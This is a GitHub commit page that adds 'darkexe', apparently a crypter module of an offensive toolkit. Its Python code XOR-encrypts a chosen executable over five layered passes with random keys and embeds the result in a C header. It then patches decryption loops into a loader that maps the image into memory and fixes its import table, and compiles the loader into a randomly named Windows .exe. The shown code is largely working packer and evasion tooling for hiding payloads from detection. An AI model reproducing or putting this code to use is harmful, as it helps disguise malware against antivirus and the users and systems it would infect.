-
Notifications
You must be signed in to change notification settings - Fork 153
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
15 changed files
with
79,277 additions
and
7 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,8 @@ | ||
| #define key0 0x5a | ||
| #define key1 0x5f | ||
| #define key2 0x2a | ||
| #define key3 0x4a | ||
| #define key4 0x62 | ||
|
|
||
| VOID FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header); | ||
| LPVOID MapImageToMemory(LPVOID base_addr); |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,66 @@ | ||
| import sys | ||
| from module.darkexe.lib import compile | ||
| from module.darkexe.lib import auxiliary | ||
| from module.darkexe.lib import encryption | ||
| from termcolor import colored | ||
|
|
||
|
|
||
| class Darkexe(object): | ||
| def __init__(self): | ||
| super(Darkexe, self).__init__() | ||
| self.enc_algos = ["xor"] | ||
| self.compile_binary = compile.Binary() | ||
|
|
||
| def _do_encrypt(self): | ||
| print(f"[i] Begining encryption via {self.crypt_type.upper()}") | ||
| keys_used = {} | ||
| for loop in range(self.loops): | ||
| if self.crypt_type == "xor": | ||
| crypt = encryption.XOR() | ||
| if loop == 0: | ||
| bytes, len, key = crypt.crypt_file(True, crypt.key, infile=self.in_file) | ||
| else: | ||
| bytes, len, key = crypt.crypt_file(True, crypt.key, infile=None, data=bytes, data_length=len) | ||
| keys_used[str(loop)] = key | ||
| if loop != self.loops - 1: | ||
| bytes = auxiliary.clean_hex_output(bytes) | ||
| return bytes, len, keys_used | ||
|
|
||
|
|
||
| def _do_jmp(self): | ||
| bytes, length, keys_used = self._do_encrypt() | ||
|
|
||
| keys = [] | ||
| for i in keys_used: keys.append(hex(int(i))) | ||
|
|
||
| pe_image = auxiliary.prepare_pe_image(length, bytes) | ||
| auxiliary.write_pe_image(pe_image) | ||
|
|
||
| auxiliary.write_header_file(keys_used, jmp=True) | ||
| file_clean = auxiliary.write_decrypt("./module/darkexe/src/jmp_loader/main.c", self.loops) | ||
|
|
||
| self.compile_binary.compile("./module/darkexe/src/jmp_loader/main.c", self.out_file) | ||
| auxiliary.clean_up("./module/darkexe/src/jmp_loader/main.c", file_clean) | ||
| print(f"[+] Wrote {auxiliary.get_size('/root/' + self.out_file)} bytes to /root/{self.out_file}") | ||
|
|
||
|
|
||
|
|
||
| def _parse_args(self, args): | ||
| self.jmp = True | ||
| self.in_file = args | ||
| self.crypt_type = 'xor' | ||
| self.loops = 5 | ||
| self.out_file = auxiliary.gen_rand_filename() + ".exe" | ||
|
|
||
| def _do_crypt(self): | ||
| print(f"[i] Started armouring {self.in_file} ({auxiliary.get_size(self.in_file)} bytes)") | ||
| if self.jmp: | ||
| self._do_jmp() | ||
|
|
||
| def run(self, args): | ||
|
|
||
| file_add = args | ||
|
|
||
| self._parse_args(args=file_add) | ||
| self._do_crypt() | ||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,105 @@ | ||
| import string | ||
| import random | ||
| import os | ||
|
|
||
|
|
||
| def gen_rand_filename(): | ||
| name = "" | ||
| for i in range(1, 10): | ||
| name += random.choice(list(string.ascii_uppercase + string.ascii_lowercase)) | ||
| return name | ||
|
|
||
|
|
||
| def get_size(filename): | ||
| with open(filename, "rb") as file: | ||
| length = len(file.read()) | ||
| return length | ||
|
|
||
|
|
||
| def clean_hex_output(hex_bytes): | ||
| raw_crypt_bytes = b"" | ||
| for byte in hex_bytes.split(): | ||
| byte = byte.replace("0x", '') | ||
| byte = byte.replace(",", '') | ||
| if len(byte) == 1: | ||
| byte = f"0{byte}" | ||
| try: | ||
| raw_crypt_bytes += bytes.fromhex(byte).encode('utf-8') | ||
| except AttributeError: | ||
| raw_crypt_bytes += bytes.fromhex(byte) | ||
| return raw_crypt_bytes | ||
|
|
||
|
|
||
| def prepare_pe_image(bytes_len, hex_bytes): | ||
| pe_image = f"#define array_len {bytes_len}\n\n" | ||
| pe_image += "unsigned long long image_crypt[] = {\n" | ||
| pe_image += hex_bytes | ||
| pe_image += "\n};" | ||
| return pe_image | ||
|
|
||
|
|
||
| def write_pe_image(pe_image): | ||
| with open("./module/darkexe/build/pe_image.h", "w") as file: | ||
| file.write(pe_image) | ||
|
|
||
|
|
||
| def write_header_file(keys_used, jmp=False, runpe=False): | ||
| headerfile = "" | ||
| with open("./module/darkexe/build/main.h", "w") as file: | ||
| for key in keys_used: | ||
| headerfile += f"#define key{key} {hex(keys_used[key])}\n" | ||
| if jmp is True: | ||
| headerfile += "\nVOID FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header);\n" | ||
| headerfile += "LPVOID MapImageToMemory(LPVOID base_addr);\n" | ||
| if runpe is True: | ||
| headerfile += "void RunFromMemory(char* pImage, char* pPath);\n" | ||
| file.write(headerfile) | ||
|
|
||
|
|
||
| def write_decrypt(path, loops, enc_type="xor"): | ||
| first_run = False | ||
| to_write = "" | ||
| if enc_type == "xor": | ||
| while loops != 0: | ||
| loops -= 1 | ||
| if first_run is False: | ||
| first_run = True | ||
| first_decrypt = """ | ||
| for (i = 0; i < array_len; i++) { | ||
| decrypted_bytes[i] = key%s ^ image_crypt[i]; | ||
| image_crypt[i] = '\\0'; | ||
| } | ||
| """ % loops | ||
| to_write += first_decrypt | ||
|
|
||
| else: | ||
| decrypt = """ | ||
| for (i = 0; i < array_len; i++) { | ||
| decrypted_bytes[i] = key%s ^ decrypted_bytes[i]; | ||
| }\n | ||
| """ % loops | ||
| to_write += decrypt | ||
|
|
||
| with open(path, "r") as file: | ||
| data = file.readlines() | ||
| file.close() | ||
|
|
||
| data_backup = data | ||
| safe = ''.join(data_backup) | ||
|
|
||
| data.insert(129, to_write) | ||
|
|
||
| outdata = ''.join(data) | ||
|
|
||
| with open(path, "w") as file: | ||
| file.write(outdata) | ||
| file.close() | ||
|
|
||
| return safe | ||
|
|
||
|
|
||
| def clean_up(path, clean): | ||
| with open(path, "w") as file: | ||
| file.write(clean) | ||
| file.close() | ||
| return |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| """ | ||
| Compile the stuffz | ||
| """ | ||
|
|
||
| import os | ||
|
|
||
| class Binary(object): | ||
| def __init__(self): | ||
| super(Binary, self).__init__() | ||
|
|
||
| def compile(self, path, outfile): | ||
| os.system(f"x86_64-w64-mingw32-gcc {path} -o /root/{outfile} -static") | ||
| return |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,41 @@ | ||
| """ | ||
| The aim with these classes is not to provide 100% cryptologically | ||
| secure encryption but to provide obsification through encryption. | ||
| """ | ||
|
|
||
| import random | ||
|
|
||
| class XOR(object): | ||
| def __init__(self): | ||
| super(XOR, self).__init__() | ||
| self.gen_key() | ||
|
|
||
| def gen_key(self): | ||
| self.key = random.randint(10, 100) | ||
|
|
||
| def crypt_file(self, crypt, key, infile=None, data=None, data_length=None): | ||
| bytes = "" | ||
| if (infile != None) and (data == None): | ||
| with open(infile, "rb") as file: | ||
| data = file.read() | ||
| data_len = len(data) | ||
| else: | ||
| data_len = data_length | ||
| iter = 0 | ||
| for num, byte in enumerate(data): | ||
| byte = hex(byte) | ||
| if crypt: | ||
| byte = hex(int(byte, 16) ^ key) | ||
| else: | ||
| if len(str(byte)) == 3: | ||
| byte = str(byte).replace("0x", '') | ||
| byte = f"0x0{byte}" | ||
| iter += 1 | ||
| if num == data_len - 1: | ||
| bytes += f"{str(byte)}" | ||
| return bytes, data_len, key | ||
| if iter == 16: | ||
| bytes += f"{str(byte)},\n" | ||
| iter = 0 | ||
| continue | ||
| bytes += f"{str(byte)}, " |
Oops, something went wrong.